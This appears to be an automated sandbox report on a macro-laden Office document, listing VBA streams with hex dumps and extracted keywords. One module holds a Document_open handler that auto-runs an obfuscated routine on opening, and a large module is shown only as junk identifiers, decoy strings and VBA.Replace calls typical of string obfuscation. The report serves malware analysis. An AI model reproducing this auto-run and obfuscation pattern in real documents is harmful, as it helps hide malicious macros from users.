                                                                                                                        Stream Path:Macros/U2v6aydkxz3
                                                                                                                        VBA File Name:U2v6aydkxz3
                                                                                                                        Stream Size:-1
                                                                                                                        Data ASCII:
                                                                                                                        Data Raw:

                                                                                                                        VBA Code Keywords

                                                                                                                        Keyword
                                                                                                                        False
                                                                                                                        VB_Exposed
                                                                                                                        Attribute
                                                                                                                        VB_Name
                                                                                                                        VB_Creatable
                                                                                                                        VB_PredeclaredId
                                                                                                                        VB_GlobalNameSpace
                                                                                                                        VB_Base
                                                                                                                        VB_Customizable
                                                                                                                        VB_TemplateDerived
                                                                                                                        VBA Code
                                                                                                                        Attribute VB_Name = "U2v6aydkxz3"
Attribute VB_Base = "0{9EF41C7F-4993-4380-9AE2-6D1717463F09}{19CB9157-FC90-46F3-9DB5-DA54BE1A1A95}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
                                                                                                                        VBA File Name: Avi6wp3s89lev, Stream Size: 700
                                                                                                                        General
                                                                                                                        Stream Path:Macros/VBA/Avi6wp3s89lev
                                                                                                                        VBA File Name:Avi6wp3s89lev
                                                                                                                        Stream Size:700
                                                                                                                        Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . # . . . . . . . . . . . . . . . . L . f . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                                                        Data Raw:01 16 01 00 00 f0 00 00 00 1c 02 00 00 d4 00 00 00 88 01 00 00 ff ff ff ff 23 02 00 00 83 02 00 00 00 00 00 00 01 00 00 00 90 4c ad 66 00 00 ff ff 03 00 00 00 00 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

                                                                                                                        VBA Code Keywords

                                                                                                                        Keyword
                                                                                                                        Attribute
                                                                                                                        VB_Name
                                                                                                                        VBA Code
                                                                                                                        Attribute VB_Name = "Avi6wp3s89lev"
                                                                                                                        VBA File Name: Bj7zc5k612ib, Stream Size: 1162
                                                                                                                        General
                                                                                                                        Stream Path:Macros/VBA/Bj7zc5k612ib
                                                                                                                        VBA File Name:Bj7zc5k612ib
                                                                                                                        Stream Size:1162
                                                                                                                        Data ASCII:. . . . . . . . . @ . . . . . . . L . . . . . . . G . . . . . . . . . . . . . . . . L ; g . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                                                        Data Raw:01 16 01 00 00 f0 00 00 00 40 03 00 00 d4 00 00 00 4c 02 00 00 ff ff ff ff 47 03 00 00 9b 03 00 00 00 00 00 00 01 00 00 00 90 4c 3b 67 00 00 ff ff 01 00 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

                                                                                                                        VBA Code Keywords

                                                                                                                        Keyword
                                                                                                                        False
                                                                                                                        VB_Exposed
                                                                                                                        Attribute
                                                                                                                        VB_Name
                                                                                                                        VB_Creatable
                                                                                                                        VB_PredeclaredId
                                                                                                                        VB_GlobalNameSpace
                                                                                                                        VB_Base
                                                                                                                        VB_Customizable
                                                                                                                        VB_TemplateDerived
                                                                                                                        VBA Code
                                                                                                                        Attribute VB_Name = "Bj7zc5k612ib"
Attribute VB_Base = "0{53E03B9E-2218-45B6-85A2-C47D984847B8}{DECDBE84-7493-4018-BC88-15CC72351445}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
                                                                                                                        VBA File Name: Hiuk_v7ho95scpn0j, Stream Size: 1169
                                                                                                                        General
                                                                                                                        Stream Path:Macros/VBA/Hiuk_v7ho95scpn0j
                                                                                                                        VBA File Name:Hiuk_v7ho95scpn0j
                                                                                                                        Stream Size:1169
                                                                                                                        Data ASCII:. . . . . . . . . @ . . . . . . . L . . . . . . . G . . . . . . . . . . . . . . . . L . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                                                        Data Raw:01 16 01 00 00 f0 00 00 00 40 03 00 00 d4 00 00 00 4c 02 00 00 ff ff ff ff 47 03 00 00 9b 03 00 00 00 00 00 00 01 00 00 00 90 4c 1c c3 00 00 ff ff 01 00 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

                                                                                                                        VBA Code Keywords

                                                                                                                        Keyword
                                                                                                                        VB_Creatable
                                                                                                                        False
                                                                                                                        VB_Exposed
                                                                                                                        Attribute
                                                                                                                        VB_Name
                                                                                                                        VB_PredeclaredId
                                                                                                                        VB_GlobalNameSpace
                                                                                                                        VB_Base
                                                                                                                        VB_Customizable
                                                                                                                        VB_TemplateDerived
                                                                                                                        VBA Code
                                                                                                                        Attribute VB_Name = "Hiuk_v7ho95scpn0j"
Attribute VB_Base = "0{DCA2A5D6-E131-4DDA-895B-3E9822E93650}{59CEE0E1-26C4-4583-B7FF-9510385F9059}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
                                                                                                                        VBA File Name: Hvp1hxwgx78q8fg4, Stream Size: 1167
                                                                                                                        General
                                                                                                                        Stream Path:Macros/VBA/Hvp1hxwgx78q8fg4
                                                                                                                        VBA File Name:Hvp1hxwgx78q8fg4
                                                                                                                        Stream Size:1167
                                                                                                                        Data ASCII:. . . . . . . . . @ . . . . . . . L . . . . . . . G . . . . . . . . . . . . . . . . L s . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                                                        Data Raw:01 16 01 00 00 f0 00 00 00 40 03 00 00 d4 00 00 00 4c 02 00 00 ff ff ff ff 47 03 00 00 9b 03 00 00 00 00 00 00 01 00 00 00 90 4c 73 a3 00 00 ff ff 01 00 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

                                                                                                                        VBA Code Keywords

                                                                                                                        Keyword
                                                                                                                        False
                                                                                                                        VB_Exposed
                                                                                                                        Attribute
                                                                                                                        VB_Name
                                                                                                                        VB_Creatable
                                                                                                                        VB_PredeclaredId
                                                                                                                        VB_GlobalNameSpace
                                                                                                                        VB_Base
                                                                                                                        VB_Customizable
                                                                                                                        VB_TemplateDerived
                                                                                                                        VBA Code
                                                                                                                        Attribute VB_Name = "Hvp1hxwgx78q8fg4"
Attribute VB_Base = "0{C2BABB20-D2C4-427C-9EDB-4620FFEE0F8C}{14D3B583-866E-4040-A821-3D821B8C0F73}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
                                                                                                                        VBA File Name: Ntx3xle2gjt1, Stream Size: 1113
                                                                                                                        General
                                                                                                                        Stream Path:Macros/VBA/Ntx3xle2gjt1
                                                                                                                        VBA File Name:Ntx3xle2gjt1
                                                                                                                        Stream Size:1113
                                                                                                                        Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . u . . . . . . . . . . . . L . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                                                        Data Raw:01 16 01 00 00 f0 00 00 00 de 02 00 00 d4 00 00 00 da 01 00 00 ff ff ff ff e5 02 00 00 75 03 00 00 00 00 00 00 01 00 00 00 90 4c f4 89 00 00 ff ff a3 00 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

                                                                                                                        VBA Code Keywords

                                                                                                                        Keyword
                                                                                                                        Private
                                                                                                                        VB_Exposed
                                                                                                                        Attribute
                                                                                                                        VB_Creatable
                                                                                                                        VB_Name
                                                                                                                        Document_open()
                                                                                                                        VB_PredeclaredId
                                                                                                                        VB_GlobalNameSpace
                                                                                                                        VB_Base
                                                                                                                        VB_Customizable
                                                                                                                        False
                                                                                                                        VB_TemplateDerived
                                                                                                                        VBA Code
                                                                                                                        Attribute VB_Name = "Ntx3xle2gjt1"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_open()
Vj_abq1qp3rat9wz
End Sub
                                                                                                                        VBA File Name: Pkebr_y5xjd5hl070, Stream Size: 1167
                                                                                                                        General
                                                                                                                        Stream Path:Macros/VBA/Pkebr_y5xjd5hl070
                                                                                                                        VBA File Name:Pkebr_y5xjd5hl070
                                                                                                                        Stream Size:1167
                                                                                                                        Data ASCII:. . . . . . . . . @ . . . . . . . L . . . . . . . G . . . . . . . . . . . . . . . . L . H . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                                                        Data Raw:01 16 01 00 00 f0 00 00 00 40 03 00 00 d4 00 00 00 4c 02 00 00 ff ff ff ff 47 03 00 00 9b 03 00 00 00 00 00 00 01 00 00 00 90 4c 18 48 00 00 ff ff 01 00 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

                                                                                                                        VBA Code Keywords

                                                                                                                        Keyword
                                                                                                                        False
                                                                                                                        VB_Exposed
                                                                                                                        Attribute
                                                                                                                        VB_Name
                                                                                                                        VB_Creatable
                                                                                                                        VB_PredeclaredId
                                                                                                                        VB_GlobalNameSpace
                                                                                                                        VB_Base
                                                                                                                        VB_Customizable
                                                                                                                        VB_TemplateDerived
                                                                                                                        VBA Code
                                                                                                                        Attribute VB_Name = "Pkebr_y5xjd5hl070"
Attribute VB_Base = "0{9D897C48-94D7-48BA-981A-540C527DFECB}{D1114CBA-B9B7-4991-84EB-5C5DD038E3F9}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
                                                                                                                        VBA File Name: Seby_rq4k8mp, Stream Size: 1164
                                                                                                                        General
                                                                                                                        Stream Path:Macros/VBA/Seby_rq4k8mp
                                                                                                                        VBA File Name:Seby_rq4k8mp
                                                                                                                        Stream Size:1164
                                                                                                                        Data ASCII:. . . . . . . . . @ . . . . . . . L . . . . . . . G . . . . . . . . . . . . . . . . L . " . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                                                        Data Raw:01 16 01 00 00 f0 00 00 00 40 03 00 00 d4 00 00 00 4c 02 00 00 ff ff ff ff 47 03 00 00 9b 03 00 00 00 00 00 00 01 00 00 00 90 4c 83 22 00 00 ff ff 01 00 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

                                                                                                                        VBA Code Keywords

                                                                                                                        Keyword
                                                                                                                        False
                                                                                                                        Attribute
                                                                                                                        VB_Name
                                                                                                                        VB_Creatable
                                                                                                                        VB_PredeclaredId
                                                                                                                        VB_GlobalNameSpace
                                                                                                                        VB_Base
                                                                                                                        VB_Customizable
                                                                                                                        VB_TemplateDerived
                                                                                                                        VB_Exposed
                                                                                                                        VBA Code
                                                                                                                        Attribute VB_Name = "Seby_rq4k8mp"
Attribute VB_Base = "0{8C08A6E4-D61D-4DFA-9005-995F3C6B461B}{AB11852B-4BC8-48EF-B786-4176F752DCC1}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
                                                                                                                        VBA File Name: T1f2hilsywf9dq, Stream Size: 26927
                                                                                                                        General
                                                                                                                        Stream Path:Macros/VBA/T1f2hilsywf9dq
                                                                                                                        VBA File Name:T1f2hilsywf9dq
                                                                                                                        Stream Size:26927
                                                                                                                        Data ASCII:. . . . . . . . . < . . . . . . . . . . . . . . . C . . . W J . . . . . . . . . . . L . B . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                                                        Data Raw:01 16 01 00 00 f0 00 00 00 3c 0d 00 00 d4 00 00 00 88 01 00 00 ff ff ff ff 43 0d 00 00 57 4a 00 00 00 00 00 00 01 00 00 00 90 4c 9d 42 00 00 ff ff 03 00 00 00 00 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

                                                                                                                        VBA Code Keywords

                                                                                                                        Keyword
                                                                                                                        'rhJGP
                                                                                                                        'XfuFHB
                                                                                                                        'WPxoGFBuC
                                                                                                                        tzmsZ:
                                                                                                                        eLkJvFE:
                                                                                                                        "KmgdV.ZGtAJHtj.ONGSH"
                                                                                                                        "MmewC.AVQUDGmHG.vtFSCPB"
                                                                                                                        'CjTuWXAF
                                                                                                                        "HoPXpGBA.IwHCJMDRA.CmlzH"
                                                                                                                        FIMZH
                                                                                                                        VBA.Replace
                                                                                                                        'AjctARC
                                                                                                                        'GWfMJkw
                                                                                                                        'KfzvA
                                                                                                                        FQNmffWt:
                                                                                                                        'zNzvOPGDA
                                                                                                                        mfYda:
                                                                                                                        'jKGHAcDG
                                                                                                                        'LRtnIrEGf
                                                                                                                        'CgEsJ
                                                                                                                        bsoyVGCFI
                                                                                                                        'hYZyKCqA
                                                                                                                        IOzIsOFA:
                                                                                                                        eLkJvFE
                                                                                                                        pOumBJl
                                                                                                                        hswrCJBk:
                                                                                                                        'nmrXG
                                                                                                                        VrYJTkgJq:
                                                                                                                        'mqsdenJm
                                                                                                                        "OECHJGADF.eWIOVB.CjlHH"
                                                                                                                        GhPWABBAC:
                                                                                                                        TbyMA
                                                                                                                        'rVQfbFK
                                                                                                                        "wLbyGHRF.DHtWiADE.NZhmG"
                                                                                                                        mKReIEI
                                                                                                                        "DGVxCZh.RlEFPCEb.wIwVQJJBo"
                                                                                                                        wdKeyS
                                                                                                                        'aRKWJBBIl
                                                                                                                        'OBuKICGCA
                                                                                                                        RjcPJ
                                                                                                                        'TGIyCPCt
                                                                                                                        'FFDZEEwAF
                                                                                                                        'PLFtB
                                                                                                                        IEMTiUEj
                                                                                                                        'VPxgCoxS
                                                                                                                        VqytEGCGP
                                                                                                                        ufcruVvA
                                                                                                                        LtmnvEE
                                                                                                                        hVZYKBKH
                                                                                                                        TpbnJRCA
                                                                                                                        fYohsF
                                                                                                                        'DXJjIaXwC
                                                                                                                        'YmPlE
                                                                                                                        'nxQwDJhLl
                                                                                                                        sgQCI
                                                                                                                        VAZyEDXCR
                                                                                                                        mMdMmt:
                                                                                                                        GhPWABBAC
                                                                                                                        hBvQG:
                                                                                                                        'PRbiJE
                                                                                                                        'PftIBSAvw
                                                                                                                        aopzzCP:
                                                                                                                        'OYgWDJ
                                                                                                                        JjteHBBVA
                                                                                                                        fVpImB
                                                                                                                        'OjVXMHwrH
                                                                                                                        'prwRBmAPJ
                                                                                                                        "NuPRDAFC.UhBsmID.EkqPGFJEG"
                                                                                                                        'vZGyCMG
                                                                                                                        'lRHQDomqI
                                                                                                                        'cZkrDE
                                                                                                                        mMdMmt
                                                                                                                        Binary
                                                                                                                        'qhIbwt
                                                                                                                        'RIXfe
                                                                                                                        suyzGICEH
                                                                                                                        eQxzwIAB
                                                                                                                        CjlbH
                                                                                                                        NLiHLTcg
                                                                                                                        'rjhOF
                                                                                                                        'uxAOGU
                                                                                                                        "npKeJB.AsJFFIJ.PEOYbGOz"
                                                                                                                        'WdtnHDFqJ
                                                                                                                        'aptRP
                                                                                                                        jzcemJ
                                                                                                                        'xNYzEIOEK
                                                                                                                        ljRDIw
                                                                                                                        'jzyrJEO
                                                                                                                        'tauleK
                                                                                                                        "glqhDDI.CLTNCt.xZeqp"
                                                                                                                        'fbVwYot
                                                                                                                        'oiKxBGHdG
                                                                                                                        'VwqWBynDr
                                                                                                                        'rHFMIEG
                                                                                                                        LxvXa
                                                                                                                        'ffoEJA
                                                                                                                        fZLyN
                                                                                                                        LZRViG
                                                                                                                        'zqGnII
                                                                                                                        'YtYiEC
                                                                                                                        diQYvIIAB
                                                                                                                        yKflP
                                                                                                                        "KjXoEi.VPFBSHI.smiQyd"
                                                                                                                        "YPhnJPEH.HagGFmEIC.cyyfEHaR"
                                                                                                                        vaaYK:
                                                                                                                        'pXFOCJTDH
                                                                                                                        'pfLrHfAD
                                                                                                                        wylCIDDAH
                                                                                                                        'RIxEqh
                                                                                                                        "cRxbPCb.XykXFJGA.LtZggMsGa"
                                                                                                                        'rnAWH
                                                                                                                        'BeGKBDhI
                                                                                                                        'LOwzHdS
                                                                                                                        wpmyAZDbH
                                                                                                                        qiVZhCBpC
                                                                                                                        'hZjGH
                                                                                                                        'XdwIJh
                                                                                                                        HZVSIIU:
                                                                                                                        'uQuAGD
                                                                                                                        'QwSTRP
                                                                                                                        'MQFmHSAB
                                                                                                                        "aejsJk.ugJxod.tsCaOC"
                                                                                                                        'JmNAGIGpg
                                                                                                                        TIucAHET
                                                                                                                        'BIJvaADA
                                                                                                                        'qortGBHFE
                                                                                                                        ZMCcDFc
                                                                                                                        HZVSIIU
                                                                                                                        'waqFE
                                                                                                                        'yJKoGGMCK
                                                                                                                        fRocABAt
                                                                                                                        "VLWvGECBE.hSxDGF.RmBdHqNjD"
                                                                                                                        'sLTHHIdWW
                                                                                                                        'vhHjyA
                                                                                                                        oqOQrACK
                                                                                                                        hswrCJBk
                                                                                                                        'HpPiAJE
                                                                                                                        'QPOFBD
                                                                                                                        PtHzDC
                                                                                                                        flWCjiEl
                                                                                                                        bsoyVGCFI:
                                                                                                                        YEORYFEgD
                                                                                                                        'WLoqEAAE
                                                                                                                        iMqHCHFJ
                                                                                                                        UcOAeq:
                                                                                                                        ZPidFrt
                                                                                                                        'yIpgX
                                                                                                                        'fxyhXM
                                                                                                                        "nOQNGhA.FYVFJ.bklIA"
                                                                                                                        'zXveB
                                                                                                                        WFNTzBZJ
                                                                                                                        'zEBHCjA
                                                                                                                        'PhsrzJ
                                                                                                                        Resume
                                                                                                                        BtpGqEA
                                                                                                                        'CQcUlBY
                                                                                                                        jCSEHHF
                                                                                                                        mjcGEp
                                                                                                                        ZSAiDINAr
                                                                                                                        LwWkX
                                                                                                                        'gOnoJFf
                                                                                                                        kWOHB
                                                                                                                        'evZsEG
                                                                                                                        'VtpqX
                                                                                                                        fYohsF:
                                                                                                                        JQIjO
                                                                                                                        'jXNDJFV
                                                                                                                        UWnPEFF
                                                                                                                        'UEeVHoE
                                                                                                                        omutJ
                                                                                                                        'ODJHAGEBR
                                                                                                                        lyHkDXIOH:
                                                                                                                        IbQUAAA
                                                                                                                        AtpoQEB
                                                                                                                        'qruEHBD
                                                                                                                        cHiYNHFqI
                                                                                                                        'EWzTDA
                                                                                                                        "emmJF.oEJjOD.giiLoEJv"
                                                                                                                        WFNTzBZJ:
                                                                                                                        'VwpCXLA
                                                                                                                        "DgRkGC.oezuIJ.QreJABJlU"
                                                                                                                        'XXZdqPuA
                                                                                                                        bqdcZF
                                                                                                                        'iwAgCMBM
                                                                                                                        pAYVi
                                                                                                                        'tzwDCH
                                                                                                                        'fcWToHE
                                                                                                                        'CaHccmUPa
                                                                                                                        'nWlYeBII
                                                                                                                        zAnUQGvFH
                                                                                                                        BPUIP:
                                                                                                                        'mqLjGXcH
                                                                                                                        mYHbrH
                                                                                                                        'XxlPH
                                                                                                                        'cSOoJx
                                                                                                                        'DwRUIBY
                                                                                                                        'srKQHAJUg
                                                                                                                        UfERFpCEB
                                                                                                                        nXQZvIEA
                                                                                                                        ZJqvCII
                                                                                                                        'QlIJBOHFE
                                                                                                                        "MuBaJAqI.JJwbBIG.xcQNDHA"
                                                                                                                        cnPZICJpM
                                                                                                                        'uNzMTBa
                                                                                                                        YenAEIAp
                                                                                                                        'DghaBJ
                                                                                                                        'TYgFHGIl
                                                                                                                        kwwmA
                                                                                                                        IWrPutAPf
                                                                                                                        HmbOBrAAC
                                                                                                                        bTmHFI
                                                                                                                        ZTXrGl
                                                                                                                        'OUTVQNcP
                                                                                                                        DBkFIE
                                                                                                                        'hjploJG
                                                                                                                        uRYMAlGHA
                                                                                                                        'hVRsJCyE
                                                                                                                        BjSOooFXD
                                                                                                                        'jqWJGRIDF
                                                                                                                        yArxc
                                                                                                                        'miPErfKDG
                                                                                                                        PJctPBAG
                                                                                                                        'KKQcfh
                                                                                                                        "GlzLdHXJB.ukgsrF.MzrWIEjI"
                                                                                                                        jcwCemL:
                                                                                                                        TyAVHBnfu
                                                                                                                        'HHZcMPC
                                                                                                                        XaCoFBkF
                                                                                                                        'HFWLG
                                                                                                                        'ljrRDq
                                                                                                                        'HEedAa
                                                                                                                        'qVFxG
                                                                                                                        'qhNOn
                                                                                                                        'ExinpI
                                                                                                                        'KwXUfSFE
                                                                                                                        'wTpIfC
                                                                                                                        SfMUAAHuE
                                                                                                                        "sVsyIHHN.BqamC.SasWG"
                                                                                                                        MQmKFAAtE
                                                                                                                        lYrlEWq
                                                                                                                        'BWcEdTac
                                                                                                                        'SEHbo
                                                                                                                        MPzbNgEEA:
                                                                                                                        VB_Name
                                                                                                                        NmHsEFc:
                                                                                                                        kwwmA:
                                                                                                                        'UkbtPHpF
                                                                                                                        'jiKjSA
                                                                                                                        VlqRGAP
                                                                                                                        'FiXcEr
                                                                                                                        nbTgII
                                                                                                                        ZXOpRLQFH:
                                                                                                                        KMpoSNLJ
                                                                                                                        MBalHjB:
                                                                                                                        "ufMYp.QtEuJ.OwOyxH"
                                                                                                                        zMifH
                                                                                                                        'DujmQIHr
                                                                                                                        PJxhq
                                                                                                                        YeFQHW:
                                                                                                                        'eCyDVgME
                                                                                                                        'tuqaDL
                                                                                                                        dvGYxIO
                                                                                                                        YeFQHW
                                                                                                                        'pIoCjKh
                                                                                                                        GfmhF
                                                                                                                        yghyBIF
                                                                                                                        'QpqEJ
                                                                                                                        iyQDTCBS
                                                                                                                        pbMAHF
                                                                                                                        "QvCuBxUE.JkVTZJh.XniaV"
                                                                                                                        cnPZICJpM:
                                                                                                                        'YDHVCICC
                                                                                                                        LZRViG:
                                                                                                                        "XBCgYJ.OzLWBT.wAQnUP"
                                                                                                                        'goxvtQ
                                                                                                                        'nuuGL
                                                                                                                        tzmsZ
                                                                                                                        "zaIoLA.TXEWrApGI.WoizH"
                                                                                                                        'ImBjDU
                                                                                                                        NQfbJHA
                                                                                                                        yXjmE
                                                                                                                        'AAbHHB
                                                                                                                        'hBmlufkDC
                                                                                                                        'rGZYAGA
                                                                                                                        'HdkzJJ
                                                                                                                        PtHzDC:
                                                                                                                        'IZCOJ
                                                                                                                        HojJPZ
                                                                                                                        "AigvGEHIB.PPCtCYDWg.gBVHiqCD"
                                                                                                                        CIXpj
                                                                                                                        UcOAeq
                                                                                                                        'PQoLBFA
                                                                                                                        'NqyUCa
                                                                                                                        JGRXFCs
                                                                                                                        'usesJGDt
                                                                                                                        "iPfhytE.BYjiXI.XRadQ"
                                                                                                                        kydQU:
                                                                                                                        'iSldRDWF
                                                                                                                        'bxJMJC
                                                                                                                        'LKuMAFDG
                                                                                                                        'yGoQlC
                                                                                                                        'AEWoE
                                                                                                                        'Kufvu
                                                                                                                        'XwQzzKI
                                                                                                                        'xMdFGb
                                                                                                                        hlWxWgB
                                                                                                                        'ZLyvHz
                                                                                                                        'vNbrJWXFs
                                                                                                                        'MYcqCEL
                                                                                                                        'zOlqpiBE
                                                                                                                        UWnwUuJ
                                                                                                                        khzFG
                                                                                                                        'ILEaPIEWu
                                                                                                                        "BbJaFjST.Xrzpku.uVfFAHQv"
                                                                                                                        WKGKGYA
                                                                                                                        ZJqvCII:
                                                                                                                        OEcMJ
                                                                                                                        'NvHuiCxB
                                                                                                                        'NhgHBItrc
                                                                                                                        'KBdNg
                                                                                                                        AoWWOyA
                                                                                                                        'pTXPAB
                                                                                                                        'UvkYP
                                                                                                                        "xbtmGo.qIuZXGHJ.RZptvtQEG"
                                                                                                                        'eOgqI
                                                                                                                        'FgyIBEFDC
                                                                                                                        'rzTvI
                                                                                                                        'XpVGACJB
                                                                                                                        CAkSJ:
                                                                                                                        'onwEG
                                                                                                                        'shuPKMcWG
                                                                                                                        SELjDEG
                                                                                                                        'jsozCGAK
                                                                                                                        'HwfPAHH
                                                                                                                        "ZVPyGDo.KHVpyJEJI.kpQfJeY"
                                                                                                                        'wBmmODIas
                                                                                                                        'zkyEFz
                                                                                                                        uuXLMGBEg
                                                                                                                        sutvLcBD
                                                                                                                        FIMZH:
                                                                                                                        suyzGICEH:
                                                                                                                        IWrPutAPf:
                                                                                                                        'WUTNECA
                                                                                                                        'HLSxHFmB
                                                                                                                        LtmnvEE:
                                                                                                                        'PQEtNI
                                                                                                                        qjEXJBwE
                                                                                                                        "VVcDBJklB.wcffJ.HXsnGGAHN"
                                                                                                                        qgkvFbl
                                                                                                                        'YYMsAjcB
                                                                                                                        IOzIsOFA
                                                                                                                        'BPXjtGAIo
                                                                                                                        'tADwHZ
                                                                                                                        jcwCemL
                                                                                                                        PJxhq:
                                                                                                                        'LuADIGI
                                                                                                                        "qqPeDr.wSQVWc.pJeJCC"
                                                                                                                        'FoPEe
                                                                                                                        'jttYD
                                                                                                                        MPzbNgEEA
                                                                                                                        CLqtBBHEM
                                                                                                                        'gsWvFVBG
